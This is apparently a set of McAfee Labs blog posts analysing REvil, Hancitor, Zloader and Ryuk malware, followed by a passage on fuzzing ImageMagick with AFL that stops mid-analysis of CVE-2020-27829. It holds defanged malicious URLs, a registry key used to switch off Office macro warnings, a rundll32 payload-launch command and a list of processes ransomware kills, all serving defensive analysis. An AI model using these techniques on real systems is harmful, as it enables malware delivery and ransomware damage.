By: McAfee Labs ‚ÄĒ

This blog was written byVaradharajan Krishnasamy, Karthickkumar, Sakshi Jaiswal

Introduction

Ransomware attacks are one of the most common cyber-attacks among organizations; due to an increase in Ransomware-as-a-service (RaaS) on the black market. RaaS provides readily available ransomware to cyber criminals and is an effective way for attackers to deploy a variety of ransomware in a short period of time.

Usually, RaaS model developers sell or rent their sophisticated ransomware framework on the black market. After purchasing the license from the ransomware developer, attackers spread the ransomware to other users, infect them, encrypt files, and demand a huge ransom payment in Bitcoin.  Also, there are discounts available on the black market for ransomware frameworks in which the ransom money paid is shared between developers and the buyer for every successful extortion of ransom from the victims. These frameworks reduce the time and effort of creating a new ransomware from scratch using latest and advanced programming languages.

REvil is one of the most famous ransomware-as-a-service (RaaS) providers. The group released the Sodinokibi ransomware in 2019, and McAfee has since observed REvil using a DLL side loading technique to execute ransomware code. The actual ransomware is a dropper that contains two embedded PE files in the resource section.  After successful execution, it drops two additional files named MsMpEng.exe and MpSvc.dll in the temp folder. The file MsMpEng.exe is a Microsoft digitally signed file having a timestamp of March 2014 (Figure 1).

Figure-1: Image of Microsoft Digitally signed File

DLL SIDE LOADING

The malware uses DLL side loading to execute the ransomware code. This technique allows the attacker to execute malicious DLLs that spoof legitimate ones. This technique has been used in many APTs to avoid detection. In this attack, MsMpEng.exe loads the functions of MpSvc.dll during the time of execution. However, the attacker has replaced the clean MpSvc.dll with the ransomware binary of the same name. The malicious DLL file has an export function named ServiceCrtMain, which is further called and executed by the Microsoft Defender file. This is a clever technique used by the attacker to execute malicious file using the Microsoft digitally signed binary.

Figure-2: Calling Export function

PAYLOAD ANALYSIS

The ransomware uses the RC4 algorithm to decrypt the config file which has all the information that supports the encryption process.

Figure-3: REvil Config File

Then it performs a UI language check using GetSystemDefaultUILanguage/GetUserDefaultUILanguage functions and compares it with a hardcoded list which contains the language ID of several countries as shown in below image.

Figure-4: Language Check

Countries excluded from this ransomware attack are mentioned below:

GetUserDefaultUILanguage Country name
0x419 Russian
0x422 Ukranian
0x423 Belarusian
0x428 Tajik (Cyrilic from Tajikistan)
0x42B Armenian
0x42C Azerbaijani (Latin from Azerbaijan)
0x437 Georgian
0x43F Kazakh from Kazakhastan
0x440 Kyrgyzstan
0x442 Turkmenistan
0x443 Latin from Uzbekistan
0x444 Tatar from Russia Federation
0x818 Romanian from Moldova
0x819 Russian from Moldova
0x82C Cyrilic from Azerbaijan
0x843 Cyrilic from Uzbekistan
0x45A Syriac
0x281A Cyrilic from Serbia

 

Additionally, the ransomware checks the users keyboardlayout and it skips the ransomware infection in the machine’s which are present in the country list above.

Figure-5: Keyboardlayout check

Ransomware creates a Global mutex in the infected machine to mark its presence.

Figure-6: Global Mutex

After creating the mutex, the ransomware deletes the files in the recycle bin using the SHEmptyRecycleBinW function to make sure that no files are restored post encryption.

Figure-7: Empty Recycle Bin

Then it enumerates all the active services with the help of the EnumServicesStatusExW function and deletes services if the service name matches the list present in the config file. The image below shows the list of services checked by the ransomware.

Figure-8: Service List check

It calls the CreateToolhelp32Snapshot, Process32FirstW and Process32NextW functions to enumerate running processes and terminates those matching the list present in the config file.  The following processes will be terminated.

  • allegro
  • steam
  • xtop
  • ocssd
  • xfssvccon
  • onenote
  • isqlplussvc
  • msaccess
  • powerpnt
  • cad
  • sqbcoreservic
  • thunderbird
  • oracle
  • infopath
  • dbeng50
  • pro_comm_msg
  • agntsvc
  • thebat
  • firefox
  • ocautoupds
  • winword
  • synctime
  • tbirdconfig
  • mspub
  • visio
  • sql
  • ocomm
  • orcad
  • mydesktopserv
  • dbsnmp
  • outlook
  • cadence
  • excel
  • wordpad
  • creoagent
  • encsvc
  • mydesktopqos

 

Then, it encrypts files using the Salsa20 algorithm and uses multithreading for fast encryption of the files. Later, background wallpaper will be set with a ransom message.

Figure-9: Desktop Wallpaper

Finally, the ransomware displays ransom notes in the victim’s machine. Below is an image of readme.txt which is dropped in the infected machine.

Figure-10: Ransom Note

IOCs and Coverage

Type Value Detection Name Detection Package Version (V3)
Loader 5a97a50e45e64db41049fd88a75f2dd2 REvil.f 4493
Dropped DLL 78066a1c4e075941272a86d4a8e49471 REvil.e 4493

 

Expert rules allow McAfee customers to extend their coverage. This rule covers this REvil ransomware behaviour.

MITRE

Technique ID Tactic Technique Details
T1059.003 Execution Command and Scripting Interpreter
T1574.002 DLL Side-Loading Hijack Execution Flow
T1486 Impact Data Encrypted for Impact
T1036.005 Defense Evasion Masquerading
T1057 Discovery Process Discovery
T1082 Discovery System Information Discovery

Conclusion

McAfee observed that the REvil group has utilized oracle web logic vulnerability (CVE-2019-2725) to spread the ransomware last year and used kaseya’s VSA application recently for their ransomware execution, with the help of DLL sideloading. REvil uses many vulnerability applications for ransomware infections, however the encryption technique remains the same. McAfee recommends making periodic backups of files and keeping them isolated off the network and having an always updated antivirus in place.

The post REvil Ransomware Uses DLL Sideloading appeared first on McAfee Blogs.

‚úá McAfee Blogs

Hancitor Making Use of Cookies to Prevent URL Scraping

By: McAfee Labs ‚ÄĒ
Consejos para protegerte de quienes intentan hackear tus correos electrónicos

This blog was written by Vallabh Chole & Oliver Devane

Over the years, the cybersecurity industry has seen many threats get taken down, such as the Emotet takedown in January 2021. It doesn’t usually take long for another threat to attempt to fill the gap left by the takedown. Hancitor is one such threat.

Like Emotet, Hancitor can send Malspams to spread itself and infect as many users as possible. Hancitor’s main purpose is to distribute other malware such as FickerStealer, Pony, CobaltStrike, Cuba Ransomware and Zeppelin Ransomware. The dropped Cobalt Strike beacons can then be used to move laterally around the infected environment and also execute other malware such as ransomware.

This blog will focus on a new technique used by Hancitor created to prevent crawlers from accessing malicious documents used to download and execute the Hancitor payload.

The infection flow of Hancitor is shown below:

A victim will receive an email with a fake DocuSign template to entice them to click a link. This link leads him to feedproxy.google.com, a service that works similar to an RSS Feed and enables site owners to publish site updates to its users.

When accessing the link, the victim is redirected to the malicious site. The site will check the User-Agent of the browser and if it is a non-Windows User-Agent the victim will be redirected to google.com.

If the victim is on a windows machine, the malicious site will create a cookie using JavaScript and then reload the site.

The code to create the cookie is shown below:

The above code will write the Timezone to value ‚Äėn‚Äô and the time offset to UTC in value ‚Äėd‚Äô and set it into cookie header for an HTTP GET Request.

For example, if this code is executed on a machine with timezone set as BST the values would be:

d = 60

n = ‚ÄúEurope/London‚ÄĚ

These values may be used to prevent further malicious activity or deploy a different payload depending on geo location.

Upon reloading, the site will check if the cookie is present and if it is, it will present them with the malicious document.

A WireShark capture of the malicious document which includes the cookie values is shown below:

The document will prompt them to enable macros and, when enabled, it will download the Hancitor DLL and then load it with Rundll32.

Hancitor will then communicate with its C&C and deploy further payloads. If running on a Windows domain, it will download and deploy a Cobalt Strike beacon.

Hancitor will also deploy SendSafe which is a spam module, and this will be used to send out malicious spam emails to infect more victims.

Conclusion

With its ability to send malicious spam emails and deploy Cobalt Strike beacons, we believe that Hancitor will be a threat closely linked to future ransomware attacks much like Emotet was. This threat also highlights the importance of constantly monitoring the threat landscape so that we can react quickly to evolving threats and protect our customers from them.

IOCs, Coverage, and MITRE

IOCs

IOC Type IOC Coverage Content Version
Malicious Document SHA256 e389a71dc450ab4077f5a23a8f798b89e4be65373d2958b0b0b517de43d06e3b W97M/Dropper.hx

 

4641
Hancitor DLL SHA256 c703924acdb199914cb585f5ecc6b18426b1a730f67d0f2606afbd38f8132ad6

 

Trojan-Hancitor.a 4644
Domain hosting Malicious Document URL http[:]//onyx-food[.]com/coccus.php RED N/A
Domain hosting Malicious Document

 

URL http[:]//feedproxy[.]google[.]com/~r/ugyxcjt/~3/4gu1Lcmj09U/coccus.php RED N/A

Mitre

Technique ID Tactic Technique details
T1566.002 Initial Access Spam mail with links
T1204.001 Execution User Execution by opening link.
T1204.002 Execution Executing downloaded doc
T1218 Defence Evasion Signed Binary Execution Rundll32
T1055 Defence Evasion Downloaded binaries are injected into svchost for execution
T1482 Discovery Domain Trust Discovery
T1071 C&C HTTP protocol for communication
T1132 C&C Data is base64 encoded and xored

 

 

The post Hancitor Making Use of Cookies to Prevent URL Scraping appeared first on McAfee Blogs.

‚úá McAfee Blogs

Zloader With a New Infection Technique

By: McAfee Labs ‚ÄĒ

This blog was written by Kiran Raj & Kishan N.

Introduction

In the last few years, Microsoft Office macro malware using social engineering as a means for malware infection has been a dominant part of the threat landscape. Malware authors continue to evolve their techniques to evade detection. These techniques involve utilizing macro obfuscation, DDE, living off the land tools (LOLBAS), and even utilizing legacy supported XLS formats.

McAfee Labs has discovered a new technique that downloads and executes malicious DLLs (Zloader) without any malicious code present in the initial spammed attachment macro. The objective of this blog is to cover the technical aspect of the newly observed technique.

Infection map

Threat Summary

  • The initial attack vector is a phishing email with a Microsoft Word document attachment.
  • Upon opening the document, a password-protected Microsoft Excel file is downloaded from a remote server.
  • The Word document Visual Basic for Applications (VBA) reads the cell contents of the downloaded XLS file and writes into the XLS VBA as macros.
  • Once the macros are written to the downloaded XLS file, the Word document sets the policy in the registry to Disable Excel Macro Warning and calls the malicious macro function dynamically from the Excel file,
  • This results in the downloading of the Zloader payload. The Zloader payload is then executed by rundll32.exe.

The section below contains the detailed technical analysis of this technique.

Detailed Technical Analysis

Infection Chain

The malware arrives through a phishing email containing a Microsoft Word document as an attachment. When the document is opened and macros are enabled, the Word document, in turn, downloads and opens another password-protected Microsoft Excel document.

After downloading the XLS file, the Word VBA reads the cell contents from XLS and creates a new macro for the same XLS file and writes the cell contents to XLS VBA macros as functions.

Once the macros are written and ready, the Word document sets the policy in the registry to Disable Excel Macro Warning and invokes the malicious macro function from the Excel file. The Excel file now downloads the Zloader payload. The Zloader payload is then executed using rundll32.exe.

Figure-1: flowchart of the Infection chain

Word Analysis

Here is how the face of the document looks when we open the document (figure 2). Normally, the macros are disabled to run by default by Microsoft Office. The malware authors are aware of this and hence present a lure image to trick the victims guiding them into enabling the macros.

Figure-2: Image of Word Document Face

The userform combo-box components present in the Word document stores all the content required to connect to the remote Excel document including the Excel object, URL, and the password required to open the Excel document. The URL is stored in the Combobox in the form of broken strings which will be later concatenated to form a complete clear string.

Figure-3: URL components (right side) and the password to open downloaded Excel document (‚Äúi5x0wbqe81s‚ÄĚ) present in user-form components.

VBA Macro Analysis of Word Document

Figure-4: Image of the VBA editor

In the above image of macros (figure 4), the code is attempting to download and open the Excel file stored in the malicious domain. Firstly, it creates an Excel application object by using CreateObject() function and reading the string from Combobox-1 (ref figure-2) of Userform-1 which has the string ‚Äúexcel. Application‚ÄĚ stored in it. After creating the object, it uses the same object to open the Excel file directly from the malicious URL along with the password without saving the file on the disk by using Workbooks.Open() function.

Figure-5: Word Macro code that reads strings present in random cells in Excel sheet.

 

The above snippet (figure 5) shows part of the macro code that is reading the strings from the Excel cells.

For Example:

Ixbq = ifk.sheets(3).Cells(44,42).Value

The code is storing the string present in sheet number 3 and the cell location (44,42) into the variable ‚Äúixbq‚ÄĚ. The Excel.Application object that is assigned to variable ‚Äúifk‚ÄĚ is used to access sheets and cells from the Excel file that is opened from the malicious domain.

In the below snippet (figure 6), we can observe the strings stored in the variables after being read from the cells. We can observe that it has string related to the registry entry ‚ÄúHKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\AccessVBOM‚ÄĚ that is used to disable trust access for VBA into Excel and the string ‚ÄúAuto_Open3‚ÄĚ that is going to be the entry point of the Excel macro execution.

We can also see the strings ‚ÄúThisWorkbook‚ÄĚ, ‚ÄúREG_DWORD‚ÄĚ, ‚ÄúVersion‚ÄĚ, ‚ÄúActiveVBProject‚ÄĚ and few random functions as well like ‚ÄúFunction c4r40() c4r40=1 End Function‚ÄĚ. These macro codes cannot be detected using static detection since the content is formed dynamically on run time.

Figure-6: Value of variables after reading Excel cells.

After extracting the contents from the Excel cells, the parent Word file creates a new VBA module in the downloaded Excel file by writing the retrieved contents. Basically, the parent Word document is retrieving the cell contents and writing them to XLS macros.

Once the macro is formed and ready, it modifies the below RegKey to disable trust access for VBA on the victim machine to execute the function seamlessly without any Microsoft Office Warnings.

HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\AccessVBOM

After writing macro contents to Excel file and disabling the trust access, function ‚ÄôAuto_Open3()‚Äô from newly written excel VBA will be called which downloads zloader dll from the ‚Äėhxxp://heavenlygem.com/22.php?5PH8Z‚Äô with extension .cpl

Figure-7: Image of ’Auto_Open3()’ function

The downloaded dll is saved in %temp% folder and executed by invoking rundll32.exe.

Figure-8: Image of zloader dll invoked by rundll32.exe

Command-line parameter:

Rundll32.exe shell32.dll,Control_RunDLL ‚Äú<path downloaded dll>‚ÄĚ

Windows Rundll32 commands loads and runs 32-bit DLLs that can be used for directly invoking specified functions or used to create shortcuts. In the above command line, the malware uses ‚ÄúRundll32.exe shell32.dll,Control_RunDLL‚ÄĚ function to invoke control.exe (control panel) and passes the DLL path as a parameter, therefore the downloaded DLL is executed by control.exe.

Excel Document Analysis:

The below image (figure 9) is the face of the password-protected Excel file that is hosted on the server. We can observe random cells storing chunks of strings like ‚ÄúRegDelete‚ÄĚ, ‚ÄúThisWorkbook‚ÄĚ, ‚ÄúDeleteLines‚ÄĚ, etc.

These strings present in worksheet cells are formed as VBA macro in the later stage.

Figure-9: Image of Remote Excel file.

Coverage and prevention guidance:

McAfee’s Endpoint products detect this variant of malware and files dropped during the infection process.

The main malicious document with SHA256 (210f12d1282e90aadb532e7e891cbe4f089ef4f3ec0568dc459fb5d546c95eaf) is detected with V3 package version ‚Äď 4328.0 as ‚ÄúW97M/Downloader.djx‚ÄĚ.¬† The final Zloader payload with SHA-256 (c55a25514c0d860980e5f13b138ae846b36a783a0fdb52041e3a8c6a22c6f5e2)which is a DLL is detected by signature ‚ÄúZloader-FCVP‚ÄĚ with V3 package version ‚Äď 4327.0

Additionally, with the help of McAfee’s Expert rule feature, customers can strengthen the security by adding custom Expert rules based on the behavior patterns of the malware. The below EP rule is specific to this infection pattern.

McAfee advises all users to avoid opening any email attachments or clicking any links present in the mail without verifying the identity of the sender. Always disable the macro execution for Office files. We advise everyone to read our blog on this new variant of Zloader and its infection cycle to understand more about the threat.

Different techniques & tactics are used by the malware to propagate and we mapped these with the MITRE ATT&CK platform.

  • E-mail Spear Phishing (T1566.001): Phishing acts as the main entry point into the victim‚Äôs system where the document comes as an attachment and the user enables the document to execute the malicious macro and cause infection. This mechanism is seen in most of the malware like Emotet, Drixed, Trickbot, Agenttesla, etc.
  • Execution (T1059.005): This is a very common behavior observed when a malicious document is opened. The document contains embedded malicious VBA macros which execute code when the document is opened/closed.
  • Defense Evasion (T1218.011): Execution of signed binary to abuse Rundll32.exe and to proxy execute the malicious code is observed in this Zloader variant. This tactic is now also part of many others like Emotet, Hancitor, Icedid, etc.
  • Defense Evasion (T1562.001): In this tactic, it Disables or Modifies security features in Microsoft Office document by changing the registry keys.

IOC

Type Value Scanner Detection Name Detection Package Version (V3)
Main Word Document 210f12d1282e90aadb532e7e891cbe4f089ef4f3ec0568dc459fb5d546c95eaf ENS W97M/Downloader.djx 4328
Downloaded dll c55a25514c0d860980e5f13b138ae846b36a783a0fdb52041e3a8c6a22c6f5e2 ENS Zloader-FCVP 4327
URL to download XLS hxxp://heavenlygem.com/11.php WebAdvisor

 

Blocked N/A
URL to download dll hxxp://heavenlygem.com/22.php?5PH8Z WebAdvisor

 

Blocked N/A

Conclusion

Malicious documents have been an entry point for most malware families and these attacks have been evolving their infection techniques and obfuscation, not just limiting to direct downloads of payload from VBA, but creating agents dynamically to download payload as we discussed in this blog. Usage of such agents in the infection chain is not only limited to Word or Excel, but further threats may use other living off the land tools to download its payloads.

Due to security concerns, macros are disabled by default in Microsoft Office applications. We suggest it is safe to enable them only when the document received is from a trusted source.

The post Zloader With a New Infection Technique appeared first on McAfee Blogs.

‚úá McAfee Blogs

New Ryuk Ransomware Sample‚ÄĮTargets Webservers

By: Marc Elias ‚ÄĒ

Executive Summary

Ryuk is a ransomware that encrypts a victim’s files and requests payment in Bitcoin cryptocurrency to release the keys used for encryption. Ryuk is used exclusively in targeted ransomware attacks.

Ryuk was first observed in August 2018 during a campaign that targeted several enterprises. Analysis of the initial versions of the ransomware revealed similarities and shared source code with the Hermes ransomware. Hermes ransomware is a commodity malware for sale on underground forums and has been used by multiple threat actors.

To encrypt files Ryuk utilizes a combination of symmetric AES (256-bit) encryption and asymmetric RSA (2048-bit or 4096-bit) encryption. The symmetric key is used to encrypt the file contents, while the asymmetric public key is used to encrypt the symmetric key. Upon payment of the ransom the corresponding asymmetric private key is released, allowing the encrypted files to be decrypted.

Because of the targeted nature of Ryuk infections, the initial infection vectors are tailored to the victim. Often seen initial vectors are spear-phishing emails, exploitation of compromised credentials to remote access systems and the use of previous commodity malware infections. As an example of the latter, the combination of Emotet and TrickBot, have frequently been observed in Ryuk attacks.

Coverage and Protection Advice

Ryuk is detected as Ransom-Ryuk![partial-hash].

Defenders should be on the lookout for traces and behaviours that correlate to‚ÄĮopen source‚ÄĮpen test tools such as‚ÄĮwinPEAS,‚ÄĮLazagne, Bloodhound and Sharp Hound, or hacking frameworks like Cobalt Strike, Metasploit, Empire or Covenant, as well as abnormal‚ÄĮbehavior‚ÄĮof non-malicious tools that have a dual use. These seemingly legitimate tools (e.g.,‚ÄĮADfind,‚ÄĮPSExec, PowerShell, etc.) can be used for things like enumeration and execution. Subsequently, be on the lookout for abnormal usage of Windows Management Instrumentation WMIC (T1047). We advise everyone to check out the following blogs on evidence indicators for a targeted ransomware attack (Part1,‚ÄĮPart2).

  • Looking at other similar Ransomware-as-a-Service families we have seen that certain entry vectors are quite common among ransomware criminals:
  • E-mail‚ÄĮSpear‚ÄĮphishing‚ÄĮ(T1566.001) often used to directly engage and/or gain an initial foothold. The initial phishing email can also be linked to a different malware strain, which acts as a loader and entry point for the attackers to continue completely compromising a victim‚Äôs network. We have observed this in the past with the likes of‚ÄĮTrickbot‚ÄĮ& Ryuk or‚ÄĮQakbot‚ÄĮ&‚ÄĮProlock, etc.
  • Exploit Public-Facing Application (T1190) is another common entry vector, given cyber criminals are often avid consumers of security news and are always on the lookout for a good exploit. We therefore encourage organizations to be fast and diligent when it comes to applying patches. There are numerous examples in the past where vulnerabilities concerning remote access software, webservers, network edge equipment and firewalls have been used as an entry point.
  • Using valid accounts (T1078) is and has been a proven method for cybercriminals to gain a foothold. After all, why break the door down if you already have the keys? Weakly protected RDP access is a prime example of this entry method. For the best tips on RDP security, please see‚ÄĮour‚ÄĮblog‚ÄĮexplaining RDP security.
  • Valid accounts can also be obtained via commodity malware such as‚ÄĮinfostealers‚ÄĮthat are designed to steal credentials from a victim‚Äôs computer.‚ÄĮInfostealer‚ÄĮlogs containing thousands of credentials can be purchased by ransomware criminals to search for VPN and corporate logins. For organizations, having a robust credential management and MFA on user accounts is an absolute must have.

When it comes to the actual‚ÄĮransomware‚ÄĮbinary, we strongly advise updating and upgrading‚ÄĮendpoint protection, as well as enabling options like tamper protection and Rollback. Please read‚ÄĮour‚ÄĮblog‚ÄĮon how to best configure ENS 10.7 to protect against ransomware for more details.

Summary of the Threat

Ryuk ransomware is used exclusively in targeted attacks

Latest sample now targets webservers

New ransom note prompts victims to install Tor browser to facilitate contact with the actors

After file encryption, the ransomware will print 50 copies of the ransom note on the default printer

Learn more about Ryuk ransomware, including Indicators of Compromise, Mitre ATT&CK techniques and Yara Rule, by reading our detailed technical analysis.

The post New Ryuk Ransomware Sample‚ÄĮTargets Webservers appeared first on McAfee Blogs.

‚úá McAfee Blogs

Fuzzing ImageMagick and Digging Deeper into CVE-2020-27829

By: Hardik Shah ‚ÄĒ

Introduction:

ImageMagick is a hugely popular open source software that is used in lot of systems around the world. It is available for the Windows, Linux, MacOS platforms as well as Android and iOS. It is used for editing, creating or converting various digital image formats and supports various formats like PNG, JPEG, WEBP, TIFF, HEIC and PDF, among others.

Google OSS Fuzz and other threat researchers have made ImageMagick the frequent focus of fuzzing, an extremely popular technique used by security researchers to discover potential zero-day vulnerabilities in open, as well as closed source software. This research has resulted in various vulnerability discoveries that must be addressed on a regular basis by its maintainers. Despite the efforts of many to expose such vulnerabilities, recent fuzzing research from McAfee has exposed new vulnerabilities involving processing of multiple image formats, in various open source and closed source software and libraries including ImageMagick and Windows GDI+.

Fuzzing ImageMagick:

Fuzzing open source libraries has been covered in a detailed blog ‚ÄúVulnerability Discovery in Open Source Libraries Part 1: Tools of the Trade‚ÄĚ last year. Fuzzing ImageMagick is very well documented, so we will be quickly covering the process in this blog post and will focus on the root cause analysis of the issue we have found.

Compiling ImageMagick with AFL:

ImageMagick has lot of configuration options which we can see by running following command:

$./configure ‚Äďhelp

We can customize various parameters as per our needs. To compile and install ImageMagick with AFL for our case, we can use following commands:

$CC=afl-gcc CXX=afl=g++ CFLAGS=‚ÄĚ-ggdb -O0 -fsanitize=address,undefined -fno-omit-frame-pointer‚ÄĚ LDFLAGS=‚ÄĚ-ggdb -fsanitize=address,undefined -fno-omit-frame-pointer‚ÄĚ ./configure

$ make -j$(nproc)

$sudo make install

This will compile and install ImageMagick with AFL instrumentation. The binary we will be fuzzing is ‚Äúmagick‚ÄĚ, also known as ‚Äúmagick tool‚ÄĚ. It has various options, but we will be using its image conversion feature to convert our image from one format to another.

A simple command would be include the following:

$ magick <input file> <output file>

This command will convert an input file to an output file format. We will be fuzzing this with AFL.

Collecting Corpus:

Before we start fuzzing, we need to have a good input corpus. One way of collecting corpus is to search on Google or GitHub. We can also use existing test corpus from various software. A good test corpus is available on the  AFL site here: https://lcamtuf.coredump.cx/afl/demo/

Minimizing Corpus:

Corpus collection is one thing, but we also need to minimize the corpus. The way AFL works is that it will instrument each basic block so that it can trace the program execution path. It maintains a shared memory as a bitmap and it uses an algorithm to check new block hits. If a new block hit has been found, it will save this information to bitmap.

Now it may be possible that more than one input file from the corpus can trigger the same path, as we have collected sample files from various sources, we don’t have any information on what paths they will trigger at the runtime. If we use this corpus without removing such files, then we end up wasting time and CPU cycles. We need to avoid that.

Interestingly AFL offers a utility called ‚Äúafl-cmin‚ÄĚ which we can use to minimize our test corpus. This is a recommended thing to do before you start any fuzzing campaign. We can run this as follows:

$afl-cmin -i <input directory> -o <output directory> ‚ÄĒ magick @@ /dev/null

This command will minimize the input corpus and will keep only those files which trigger unique paths.

Running Fuzzers:

After we have minimized corpus, we can start fuzzing. To fuzz we need to use following command:

$afl-fuzz -i <mincorpus directory> -o <output directory> ‚ÄĒ magick @@ /dev/null

This will only run a single instance of AFL utilizing a single core. In case we have multicore processors, we can run multiple instances of AFL, with one Master and n number of Slaves. Where n is the available CPU cores.

To check available CPU cores, we can use this command:

$nproc

This will give us the number of CPU cores (depending on the system) as follows:

In this case there are eight cores. So, we can run one Master and up to seven Slaves.

To run master instances, we can use following command:

$afl-fuzz -M Master -i <mincorpus directory> -o <output directory> ‚ÄĒ magick @@ /dev/null

We can run slave instances using following command:

$afl-fuzz -S Slave1 -i <mincorpus directory> -o <output directory> ‚ÄĒ magick @@ /dev/null

$afl-fuzz -S Slave2 -i <mincorpus directory> -o <output directory> ‚ÄĒ magick @@ /dev/null

The same can be done for each slave. We just need to use an argument -S and can use any name like slave1, slave2, etc.

Results:

Within a few hours of beginning this Fuzzing campaign, we found one crash related to an out of bound read inside a heap memory. We have reported this issue to ImageMagick, and they were very prompt in fixing it with a patch the very next day. ImageMagick has release a new build with version: 7.0.46 to fix this issue. This issue was assigned CVE-2020-27829.

Analyzing CVE-2020-27829:

On checking the POC file, we found that it was a TIFF file.

When we open this file with ImageMagick with following command:

$magick poc.tif /dev/null

As a result, we see a crash like below:

As is clear from the above log, the program was trying to read 1 byte past allocated heap buffer and therefore ASAN caused this crash. This can atleast lead to a  ImageMagick crash on the systems running vulnerable version of ImageMagick.

Understanding TIFF file format:

Before we start debugging this issue to find a root cause, it is necessary to understand the TIFF file format. Its specification is very well described here: http://paulbourke.net/dataformats/tiff/tiff_summary.pdf.

In short, a TIFF file has three parts:

  1. Image File Header (IFH) ‚Äď Contains information such as file identifier, version, offset of IFD.
  2. Image File Directory (IFD) ‚Äď Contains information on the height, width, and depth of the image, the number of colour planes, etc. It also contains various TAGs like colormap, page number, BitPerSample, FillOrder,
  3. Bitmap data ‚Äď Contains various image data like strips, tiles, etc.

We can tiffinfo utility from libtiff to gather various information about the POC file. This allows us to see the following information with tiffinfo like width, height, sample per pixel, row per strip etc.:

There are a few things to note here:

TIFF Dir offset is: 0xa0

Image width is: 3 and length is: 32

Bits per sample is: 9

Sample per pixel is: 3

Rows per strip is: 1024

Planer configuration is: single image plane.

We will be using this data moving forward in this post.

Debugging the issue:

As we can see in the crash log, program was crashing at function ‚ÄúPushQuantumPixel‚ÄĚ in the following location in quantum-import.c line 256:

On checking ‚ÄúPushQuantumPixel‚ÄĚ function in ‚ÄúMagickCore/quantum-import.c‚ÄĚ we can see the following code at line #256 where program is crashing:

We can see following:

  • ‚Äúpixels‚ÄĚ seems to be a character array
  • inside a for loop its value is being read and it is being assigned to quantum_info->state.pixel
  • its address is increased by one in each loop iteration

The program is crashing at this location while reading the value of ‚Äúpixels‚ÄĚ which means that value is out of bound from the allocated heap memory.

Now we need to figure out following:

  1. What is ‚Äúpixels‚ÄĚ and what data it contains?
  2. Why it is crashing?
  3. How this was fixed?

Finding root cause:

To start with, we can check ‚ÄúReadTIFFImage‚ÄĚ function in coders/tiff.c file and see that it allocates memory using a ‚ÄúAcquireQuantumMemory‚ÄĚ function call, which appears as per the documentation mentioned here:

https://imagemagick.org/api/memory.php:

“Returns a pointer to a block of memory at least count * quantum bytes suitably aligned for any use.

The format of the ‚ÄúAcquireQuantumMemory‚ÄĚ method is:

void *AcquireQuantumMemory(const size_t count,const size_t quantum)

A description of each parameter follows:

count

the number of objects to allocate contiguously.

quantum

the size (in bytes) of each object. “

In this case two parameters passed to this function are ‚Äúextent‚ÄĚ and ‚Äúsizeof(*strip_pixels)‚ÄĚ

We can see that ‚Äúextent‚ÄĚ is calculated as following in the code below:

There is a function TIFFStripSize(tiff) which returns size for a strip of data as mentioned in libtiff documentation here:

http://www.libtiff.org/man/TIFFstrip.3t.html

In our case, it returns 224 and we can also see that in the code mentioned above,¬† ‚Äúimage->columns * sizeof(uint64)‚ÄĚ is also added to extent, which results in 24 added to extent, so extent value becomes 248.

So, this extent value of 248 and sizeof(*strip_pixels) which is 1 is passed to ‚ÄúAcquireQuantumMemory‚ÄĚ function and total memory of 248 bytes get allocated.

This is how memory is allocated.

‚ÄúStrip_pixel‚ÄĚ is pointer to newly allocated memory.

Note that this is 248 bytes of newly allocated memory. Since we are using ASAN, each byte will contain ‚Äú0xbe‚ÄĚ which is default for newly allocated memory by ASAN:

https://github.com/llvm-mirror/compiler-rt/blob/master/lib/asan/asan_flags.inc

The memory start location is 0x6110000002c0 and the end location is 0x6110000003b7, which is 248 bytes total.

This memory is set to 0 by a ‚Äúmemset‚ÄĚ call and this is assigned to a variable ‚Äúp‚ÄĚ, as mentioned in below image. Please also note that ‚Äúp‚ÄĚ will be used as a pointer to traverse this memory location going forward in the program:

Later on we see that there is a call to ‚ÄúTIFFReadEncodedPixels‚ÄĚ which reads strip data from TIFF file and stores it into newly allocated buffer ‚Äústrip_pixels‚ÄĚ of 248 bytes (documentation here: http://www.libtiff.org/man/TIFFReadEncodedStrip.3t.html):

To understand what this TIFF file data is, we need to again refer to TIFF file structure. We can see that there is a tag called ‚ÄúStripOffsets‚ÄĚ and its value is 8, which specifies the offset of strip data inside TIFF file:

We see the following when we check data at offset 8 in the TIFF file:

We see the following when we print the data in ‚Äústrip_pixels‚ÄĚ (note that it is in little endian format):

So ‚Äústrip_pixels‚ÄĚ is the actual data from the TIFF file from offset 8. This will be traversed through pointer ‚Äúp‚ÄĚ.

Inside ‚ÄúReadTIFFImage‚ÄĚ function there are two nested for loops.

  • The first ‚Äúfor loop‚ÄĚ is responsible for iterating for ‚Äúsamples_per_pixel‚ÄĚ time which is 3.
  • The second ‚Äúfor loop‚ÄĚ is responsible for iterating the pixel data for ‚Äúimage->rows‚ÄĚ times, which is 32. This second loop will be executed for 32 times or number of rows in the image irrespective of allocated buffer size .
  • Inside this second for loop, we can see something like this:

  • We can notice that ‚ÄúImportQuantumPixel‚ÄĚ function uses the ‚Äúp‚ÄĚ pointer to read the data from ‚Äústrip_pixels‚ÄĚ and after each call to ‚ÄúImportQuantumPixel‚ÄĚ, value of ‚Äúp‚ÄĚ will be increased by ‚Äústride‚ÄĚ.

Here ‚Äústride‚ÄĚ is calculated by calling function ‚ÄúTIFFVStripSize()‚ÄĚ function which as per documentation returns the number of bytes in a strip with¬†nrows¬†rows of data.¬† In this case it is 14. So, every time pointer ‚Äúp‚ÄĚ is incremented by ‚Äú14‚ÄĚ or ‚Äú0xE‚ÄĚ inside the second for loop.

If we print the image structure which is passed to ‚ÄúImportQuantumPixels‚ÄĚ function as parameter, we can see following:

Here we can notice that the columns value is 3, the rows value is 32 and depth is 9. If we check in the POC TIFF file, this has been taken from ImageWidth and ImageLength and BitsPerSample value:

Ultimately, control reaches to ‚ÄúImportRGBQuantum‚ÄĚ and then to the ‚ÄúPushQuantumPixel‚ÄĚ function and one of the arguments to this function is the pixels data which is pointed by ‚Äúp‚ÄĚ. Remember that this points to the memory address which was previously allocated using the ‚ÄúAcquireQuantumMemory‚ÄĚ function, and that its length is 248 byte and every time value of ‚Äúp‚ÄĚ is increased by 14.

The ‚ÄúPushQuantumPixel‚ÄĚ function is used to read pixel data from ‚Äúp‚ÄĚ into the internal pixel data storage of ImageMagick. There is a for loop which is responsible for reading data from the provided pixels array of 248 bytes into a structure ‚Äúquantum_Info‚ÄĚ. This loop reads data from pixels incrementally and saves it in the ‚Äúquantum_info->state.pixels‚ÄĚ field.

